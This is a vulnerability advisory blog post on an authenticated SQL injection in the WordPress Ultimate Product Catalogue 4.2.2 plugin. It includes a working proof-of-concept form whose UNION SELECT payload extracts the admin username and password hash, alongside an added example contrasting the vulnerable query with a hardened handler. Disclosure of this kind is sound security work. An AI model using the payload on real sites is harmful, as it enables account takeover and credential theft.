WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2
# Tested on: Ubuntu 16.04

1 – Description:

Required user access: registered user.

The $_POST['CatID'] parameter is not escaped before it is used in a database query.

Ultimate Product Catalogue 4.2.2 SQL Injection

2 – Proof of Concept:

1 – Log in as a regular user (created using wp-login.php?action=register):

2 – Submit the following form:

<form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<input type="submit">
</form>
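For reference, the shape of the flaw the advisory describes (an unescaped CatID concatenated into SQL) beside a hardened WordPress AJAX handler. This is an added example, not the plugin's own code: the table name, column names, nonce action and function names are assumptions; only the `get_upcp_subcategories` action and the `CatID` parameter come from the advisory.

```php
<?php
// Added example, not code from Ultimate Product Catalogue. Table/column names,
// the nonce action name and the function names are assumptions.

// --- Vulnerable pattern (assumed shape of the flaw described above) ---
function upcp_subcategories_vulnerable() {
    global $wpdb;
    // The request body value is concatenated straight into the SQL string,
    // so whoever sends the request controls the rest of the query.
    $cat_id = $_POST['CatID'];
    $rows   = $wpdb->get_results(
        "SELECT SubCatID, SubCategory_Name FROM {$wpdb->prefix}upcp_subcategories"
        . " WHERE Category_ID=" . $cat_id
    );
    wp_send_json( $rows );
}

// --- Hardened pattern ---
function upcp_subcategories_hardened() {
    global $wpdb;

    // 1. Request origin: tie the AJAX call to a nonce issued with the page
    //    (nonce action 'upcp_subcategories' is an assumed name).
    check_ajax_referer( 'upcp_subcategories', 'nonce' );

    // 2. Type enforcement: a category ID is a positive integer; absint()
    //    discards anything else, so a UNION or WHERE fragment becomes 0.
    $cat_id = isset( $_POST['CatID'] ) ? absint( wp_unslash( $_POST['CatID'] ) ) : 0;
    if ( 0 === $cat_id ) {
        wp_send_json_error( array( 'message' => 'invalid CatID' ), 400 );
    }

    // 3. Parameterised query: $wpdb->prepare() binds the value and %d
    //    forces an integer placeholder, so the SQL structure is fixed.
    $sql = $wpdb->prepare(
        "SELECT SubCatID, SubCategory_Name FROM {$wpdb->prefix}upcp_subcategories"
        . " WHERE Category_ID = %d",
        $cat_id
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// wp_ajax_* handlers run for logged-in users, which matches the advisory's
// "registered user" precondition; add the nopriv hook only if anonymous
// visitors genuinely need this lookup.
add_action( 'wp_ajax_get_upcp_subcategories', 'upcp_subcategories_hardened' );
```

The integer cast alone closes the injection shown in the proof of concept; the nonce check is the usual companion so that the endpoint cannot be driven from a third-party page, and `wp_send_json_error` with a 400 keeps rejected requests visible in access logs.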

3 – Timeline:

– 22/05/2017 – Discovered
– 24/05/2017 – Vendor not found
– **/06/2017 – Corrected

Permalink: https://www.unhonker.com/bug/1995.html | 90' s Blog | Focus on network information security

This post was published by unhonker on 28 June 2017 in the Vulnerability Disclosure category. You may comment on it and quote it on your own website or blog provided the original address and author are kept.